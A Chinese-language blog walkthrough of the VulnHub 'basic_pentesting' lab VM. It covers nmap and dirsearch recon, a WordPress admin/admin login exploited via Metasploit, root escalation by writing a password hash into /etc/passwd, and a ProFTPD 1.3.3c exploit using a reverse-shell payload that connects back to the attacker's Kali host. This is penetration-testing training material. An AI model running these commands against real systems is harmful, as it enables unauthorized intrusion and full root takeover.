首页 > 其他分享 >vulnhub入门靶场:basic_pentesting

vulnhub入门靶场:basic_pentesting

时间:2024-09-28 17:19:22浏览次数:3  
标签:set 密码 admin ip etc 192.168 pentesting vulnhub basic

靶机下载链接:https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova

一、环境安装

双击下载好的.ova文件即可在VMware上打开

网卡这里确保与kali使用同一网卡,处于同一网段

二、信息收集

先确定kali的ip:192.168.231.133

扫描一下靶机的ip:192.168.231.196

arp-scan -l

确定好目标后,还是老规矩扫个端口

nmap -p- -A -sS 192.168.231.196

这里开放了21(ftp),22(ssh),80(http)端口

既然有80端口,尝试访问一下顺便扫个目录

这里还是用dirsearch

kali没有自带

apt-get update
apt-get install dirsearch

直接输入这俩条命令就可以安装

dirsearch -u http://192.168.231.196

这里探测出 /secret 这一个

先看看首页面,看着没什么有用的信息

那就看看/secret

看起来是一个wordpress的cms搭建的平台

三、getshell + 权限提升

方法一 wp

既然是wordpress搭建的网站,根据它的历史漏洞思路,我们再用dirsearch扫一手二级目录看能不能找到后台页面

dirsearch -u http://192.168.231.196/secret

这里探测出很多,最重要的还是探测出/wp-admin,这个后台地址访问一手试试

这里出现了登陆界面

正准备试试弱口令发现url被重定向到vtcsec这里,手动重新换上目标的ip

简单一试 用户名和密码都是 admin admin

既然知道了账号密码,那就更简单了

直接上msf搜索历史漏洞

msfconsole
search wp_admin

确实存在

use 0 #使用搜索到的脚本
show options #查看需要设置的参数
set USERNAME admin
set PASSWORD admin
set RHOSTS 192.168.231.196
set TARGETURI /secret
run

成功拿到 meterpreter 会话

我们转成交互式的会话

shell
python -c 'import pty;pty.spawn("/bin/bash")'

提权的话这里发现 sudo -l 需要密码,只能换个方法

ctrl + c 然后输入 N ,返回meterpreter会话

meterpreter 下有个edit 命令,是类似于vim编辑器的,用来编辑文件的

知道了,/etc/passwd 第二位x,是密码占位符,密码其实是加密存储在/etc/shadow下的,可以假设x 位密码存在,那么root 就会默认密码为x位。就不会去读取/etc/shadow.正好可以利用edit来进行编辑

大概意思就是系统会先读取/etc/passwd中的密码,如果没有再去读/etc/shadow里,所以我们修改/etc/passwd中的密码即可

利用openssl passwd -1,生成密码,密码明文为admin

$1$c06.peqf$MTGVzyPQgQvLTvT.Xk64B1

meterpreter下,输入命令:edit /etc/passwd,发现可以编辑,将之前生成的密码替换x的位置,然后wq保存设置

然后重新转成交互式的会话

shell
python -c 'import pty;pty.spawn("/bin/bash")'

然后直接su root ,输入密码 admin 即可提权成功

方法二 ftp

开放了个21端口的ftp服务,并且版本是ProFTPD 1.3.3c,去看看msf上有没有历史漏洞

msfconsole
search proftpd 1.3.3

看了看确实有,那事情就简单多了,use 10,选择后

show options 看看必选项

这里只需要填一下ip和端口就行

那就顺便再设置一下payload

set LHOST 192.168.231.133        #kali的ip
set LpORT 9999                   #kali的监听端口
set payload cmd/unix/reverse
set RHOSTS 192.168.231.196				#靶机的ip
set RPORT 21
run

这里就成功拿到shell并且还是root权限

标签:set,密码,admin,ip,etc,192.168,pentesting,vulnhub,basic
From: https://blog.csdn.net/2401_83378606/article/details/142577936

相关文章

  • VulnHub-SickOs1.1靶机笔记
    SickOs1.1靶机笔记概述Vulnhub的靶机sickos1.1主要练习从互联网上搜索信息的能力,还考察了对代理使用,目录爆破的能力,很不错的靶机靶机地址:链接:https://pan.baidu.com/s/1JOTvKbfT-IpcgypcxaCEyQ?pwd=ytad提取码:ytad一、nmap扫描1)主机发现sudonmap-sn192.168.111.0/......
  • vulnhub-Basic Pentesting 2靶机
    vulnhub:https://www.vulnhub.com/entry/basic-pentesting-2,241/导入靶机(建议VirtualBox,VMWare扫不到),放在kali同网段,扫描靶机在192.168.81.3,扫描端口很多端口,存在网站服务,访问啥也没有查看8080端口是Tomcat的页面,也没啥东西尝试从ssh服务突破,枚举用户enum4li......
  • 自动加载类文件时发生错误,类名【core\\basic\\Kernel】
    当你使用PbootCMS时遇到了自动加载类文件时发生的错误,具体错误信息如下:自动加载类文件时发生错误,类名【core\\basic\\Kernel】这个问题通常是由于Kernel.php文件丢失或被误删除导致的。特别是在阿里云虚拟主机环境下,可能会因为安全策略而删除某些文件。以下是详细的解决......
  • Vulnhub靶机:Depth: 1
    0x01项目地址Depth:10x02靶机描述Manytimeswhileconductingapentest,Ineedtoscriptsomethinguptomakemylifeeasierortoquicklytestanattackideaorvector.RecentlyIcameacrossaninterestingcommandinjectionvectoronawebapplicatio......
  • Vulnhub靶机:The Ether: EvilScience
    0x01项目地址TheEther:EvilScience(v1.0.1)0x02靶机描述ThegoalistofindoutwhatTheEtherisupto.Youwillberequiredtobreakintotheirserver,rootthemachine,andretrievetheflag.目标是找出TheEther的意图。你需要侵入他们的服务器,获取ro......
  • CClink IEF Basic设备数据 转 profinet IO项目案例
    目录1 案例说明 12 VFBOX网关工作原理 13 准备工作 24 网关采集CCLINKIEFBASIC数据 25 用PROFINETIO协议转发数据 56 案例总结 81 案例说明设置vfbox网关采集CClinkIEFBasic设备数据把采集的数据转成profinetIO协议转发给其他系统。2 VFBOX网关工作原理VFBOX网......
  • 【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-3 Writeup(SQL注入+GET请
    sqli-labs1点击启动靶机。SQLi-LABSPage-1(BasicChallenges)解法发送GET请求,id作为参数。http://b38e0f15-7e65-40e6-abf2-fc99e50b38e4.node5.buuoj.cn/Less-3/?id=1返回了用户名和密码。?id=1'发生报错。闭合括号:?id=1');--+正常输出。判断......
  • 【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-4 Writeup(SQL注入+GET请
    sqli-labs1点击启动靶机。SQLi-LABSPage-1(BasicChallenges)解法发送GET请求,id作为参数。http://b38e0f15-7e65-40e6-abf2-fc99e50b38e4.node5.buuoj.cn/Less-4/?id=1返回了用户名和密码。?id=1'正常输出。?id=1"发生报错。构造闭合:?id=1");--......
  • [vulnhub] LAMPSecurity: CTF4
    https://www.vulnhub.com/entry/lampsecurity-ctf4,83/端口扫描主机发现探测存活主机,138是靶机nmap-sP192.168.75.0/24//StartingNmap7.93(https://nmap.org)at2024-09-2314:13CSTNmapscanreportfor192.168.75.1H......
  • [vulnhub]LAMPSecurity: CTF5
    https://www.vulnhub.com/entry/lampsecurity-ctf5,84/主机发现端口扫描探测存活主机,139为靶机nmap-sP192.168.75.0/24StartingNmap7.93(https://nmap.org)at2024-09-2317:27CSTNmapscanreportfor192.168.75.1Hostisup(0.00049slatency).MACAddres......